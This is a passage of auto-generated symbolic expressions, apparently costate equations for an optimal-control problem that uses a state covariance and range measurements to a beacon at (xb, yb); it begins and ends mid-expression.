xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s 
- xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - 
yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - 
yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + 